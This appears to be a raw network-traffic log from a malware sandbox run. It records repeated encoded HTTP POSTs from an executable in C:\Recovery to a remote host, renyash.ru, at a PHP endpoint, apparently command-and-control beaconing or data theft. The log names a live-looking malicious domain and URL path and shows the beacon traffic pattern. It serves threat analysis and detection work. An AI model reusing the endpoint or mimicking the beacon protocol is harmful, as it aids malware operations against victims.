Jan 9, 2025 18:13:52.525923014 CET	1012	OUT	Data Raw: 55 52 5e 5f 58 41 55 55 59 58 51 54 5b 54 57 50 5f 5d 58 54 52 5e 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR^_XAUUYXQT[TWP_]XTR^ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[=> >='[8++7&+[>05>1 18?Z!/_?'\"/Y.$
Jan 9, 2025 18:13:52.617923021 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:52.868572950 CET	800	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lmAdnsiVM%2FRmPZ2r1jgLlowzZJIDPBYzo8miSAmObQUYGnyWJ8xF69xzZmTqw5AZlMsnEt1XLkZSRFJzHIW0LhcwzyZpXCacto1GXlRjtpf9aHtmIf8Rcmku6gHBK1zsAi5aSGK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f778db143ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3935&min_rtt=1718&rtt_var=5080&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=75021&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50130	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:52.988219023 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:53.346752882 CET	1012	OUT	Data Raw: 50 55 5b 5e 58 45 50 50 59 58 51 54 5b 54 57 56 5f 54 58 58 52 5e 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU[^XEPPYXQT[TWV_TXXR^Z@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )3%#>)U+[-;77% +)<5=!1=S28#[ ?_<:'\"/Y.$
Jan 9, 2025 18:13:53.474709988 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:53.631685019 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4hlcUNds%2B%2B7r%2Fiaw3vo5fJnElMB6Ht2W%2Bu3b82bggRgf3dzcOzaM9cl2Srtb2HkpAAc2Gmp9DvdZ7QLccphUEdB2DyYE22BHVr7jf%2FhU4%2FD4EtOmyRAI4ZtpUgGENYh0rNAPqHw4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f7cfc32ef9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4683&min_rtt=1964&rtt_var=6175&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=61556&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:53.719014883 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50131	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:53.852533102 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:54.206203938 CET	1012	OUT	Data Raw: 50 52 5e 58 58 49 50 52 59 58 51 54 5b 50 57 53 5f 50 58 5d 52 5a 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR^XXIPRYXQT[PWS_PX]RZZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )3-_4,#Y,#C7_=8S =6%=W2(44('\"/Y.4
Jan 9, 2025 18:13:54.314378023 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:54.582663059 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bk453Bj7GgQfuXF9n834d6f4HMRqPlF88DUg39xLTxeWXiXrYZPFDSzm6a4ML%2Ffr2a5qDnsBIwkMToEm%2FdawuvnKLkcOpvIgfvzcp%2FTo2PK4vmHVOB3hgHQsFsHhC5rZHNW1F2fV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f823e458c65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3734&min_rtt=2012&rtt_var=4198&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=92475&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0
Jan 9, 2025 18:13:54.820605040 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bk453Bj7GgQfuXF9n834d6f4HMRqPlF88DUg39xLTxeWXiXrYZPFDSzm6a4ML%2Ffr2a5qDnsBIwkMToEm%2FdawuvnKLkcOpvIgfvzcp%2FTo2PK4vmHVOB3hgHQsFsHhC5rZHNW1F2fV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f823e458c65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3734&min_rtt=2012&rtt_var=4198&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=92475&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50132	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:54.821247101 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50133	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:55.024806023 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:55.380573988 CET	1292	OUT	Data Raw: 50 55 5e 5c 58 43 55 55 59 58 51 54 5b 5d 57 51 5f 53 58 5f 52 58 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU^\XCUUYXQT[]WQ_SX_RXZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#%]4<)U$,"%(:/!>%V%&&874?+'\"/Y.
Jan 9, 2025 18:13:55.484664917 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:55.760760069 CET	955	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTjPs9xdyeEGbh73uh3h46F7uILOyYwc%2BnKCJI38hra8BTrXlAPjtiK7PHoWSWZY2P8UOE1MRgRA7hSEC%2FpuzpvJfqO7kwdcOZpapQa5lo2DH1woFh56XfyuaBvZ%2BCvernjP8uJk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f898d63421c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11719&min_rtt=4273&rtt_var=16494&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=22869&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 22 00 32 0b 05 52 27 02 33 50 26 08 21 50 21 0f 3d 00 2c 2d 30 40 23 03 20 05 2f 1c 21 5b 21 3f 27 5d 26 22 31 50 25 05 38 0b 36 36 21 5d 01 12 24 5a 30 39 3e 11 24 10 05 07 25 28 0d 07 34 07 38 5f 27 38 31 0a 32 33 1a 56 36 03 36 08 28 2d 0c 04 38 3f 24 5d 2f 51 33 07 3f 03 2b 51 0e 10 22 57 27 3e 22 15 29 3d 27 12 26 22 28 53 3e 59 2b 13 26 3c 34 55 2a 5f 3c 1e 27 17 27 01 37 3f 3f 07 28 14 28 11 27 06 2a 0e 29 28 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"2R'3P&!P!=,-0@# /![!?']&"1P%866!]$Z09>$%(48_'8123V66(-8?$]/Q3?+Q"W'>")='&"(S>Y+&<4U_<''7??((')( \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50134	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:55.147893906 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:55.503406048 CET	1012	OUT	Data Raw: 55 52 5e 58 58 45 50 55 59 58 51 54 5b 5c 57 52 5f 52 58 5b 52 53 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR^XXEPUYXQT[\WR_RX[RSZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +3%]4,&>33/7Z#5'^) R =%0>1Z4?\('\"/Y.
Jan 9, 2025 18:13:55.591604948 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:55.767771006 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QRPQeRFnzkGDgTp0HJ%2Fd18FO%2BzjljNPeM%2BO0VjomUcBzTyFa2JU1CSfceJZdRJZztpcgD5ByACpu%2FXoG3%2Bu67Fi%2BZ56xP1PO6NM0ImARg4NhuTUXuP6HOxzm5TsSzSFgWH9xVSxu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f8a3cb5430d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2408&min_rtt=1934&rtt_var=1673&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=254888&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50135	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:55.894821882 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue
Jan 9, 2025 18:13:56.253006935 CET	1008	OUT	Data Raw: 50 56 5b 54 58 49 50 53 59 58 51 54 5b 55 57 52 5f 53 58 58 52 59 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV[TXIPSYXQT[UWR_SXXRYZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^#_#Z1=];#^>$W5=5W10=%+_7Y8)'\"/Y.
Jan 9, 2025 18:13:56.363181114 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:56.536175013 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sn2Yrd%2FFru2eouP%2FFu%2Fq4cBAp3iKqYgmaDI6pVJG5tBaVDusRz6dLbcfogjfk3R10VbDJXA8d4FeL2%2Beuql0abdG%2FulCgWt3iWXI%2FAAyt7UaVHlgfj5zZk3%2BtgNk24NxuuvQdrxG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f8ef9577cf3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4067&min_rtt=1948&rtt_var=4970&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=77220&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50136	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:56.665204048 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:57.018696070 CET	1012	OUT	Data Raw: 50 52 5b 5b 58 45 55 54 59 58 51 54 5b 57 57 57 5f 56 58 55 52 53 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR[[XEUTYXQT[WWW_VXURSZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )&#Z!);X8(#Z4 )) T")U11;'_7+]<*'\"/Y.(
Jan 9, 2025 18:13:57.224293947 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:57.462692022 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Idso7bKeXsUxbHdQXT%2B26Z0q0J%2BaFaTIZhdQX%2FoS6lUbxLDfyqdbeUFIXmGcF7qovlxSrVtaCwo%2Brxd0bTFeafVuER4r8qlqk5f26ViYZxGObngvE%2B84E7VhKNuE%2BOtQEAPT5IzE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f945f5e4286-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3677&min_rtt=2451&rtt_var=3372&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=119057&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50137	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:57.602757931 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:57.956079960 CET	1012	OUT	Data Raw: 50 54 5b 55 5d 40 55 55 59 58 51 54 5b 54 57 52 5f 53 58 59 52 53 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT[U]@UUYXQT[TWR_SXYRSZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X3! <-# -( 5\)R"&#=R&8 ,<+'\"/Y.$
Jan 9, 2025 18:13:58.095144987 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:58.370287895 CET	805	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8TeQdm2LStbt4RvqCpeJi4J8kMSRS5q%2FV6QYmZhuMEDjl8tUZimdwMRpthMMkRHznpH7WON46nFFpW%2F7YOdRfZ7SXLTNMmWXHmZuvjBoJnFuXygqmz0FOGWlvgbnL4ku%2Bv0tYVA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f99cd146a5c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7715&min_rtt=1783&rtt_var=12532&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=29651&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50138	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:58.492315054 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:58.850538969 CET	1012	OUT	Data Raw: 50 5e 5b 58 58 47 50 55 59 58 51 54 5b 5d 57 53 5f 57 58 5c 52 5b 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[XXGPUYXQT[]WS_WX\R[ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X)#,\)088(]7%#^):;6=&*%;(!??+'\"/Y.
Jan 9, 2025 18:13:58.936728001 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:59.403876066 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUL%2BcZpJjN2YbNk1Jbr93PoFCgNq6dBIdmJMp6ZnSjUfZD%2Fm2H4RX3tMqmNWvkQec00LErvy8IXmnm189Nyw05CWy47%2Bd%2FlALYSn8stwK8B1P%2FRGszCtgcweFo9EC9uUxTK2y0T6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f9f1eecde99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2230&min_rtt=1460&rtt_var=2088&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=191500&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50139	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:59.537612915 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:59.893513918 CET	1012	OUT	Data Raw: 55 55 5b 5b 58 41 55 5f 59 58 51 54 5b 50 57 51 5f 50 58 5a 52 58 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU[[XAU_YXQT[PWQ_PXZRXZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#9X!?&>8-83 5'_)<S -%S13=%#Z7Y(?'\"/Y.4
Jan 9, 2025 18:14:00.015043974 CET	25	IN	HTTP/1.1 100 Continue
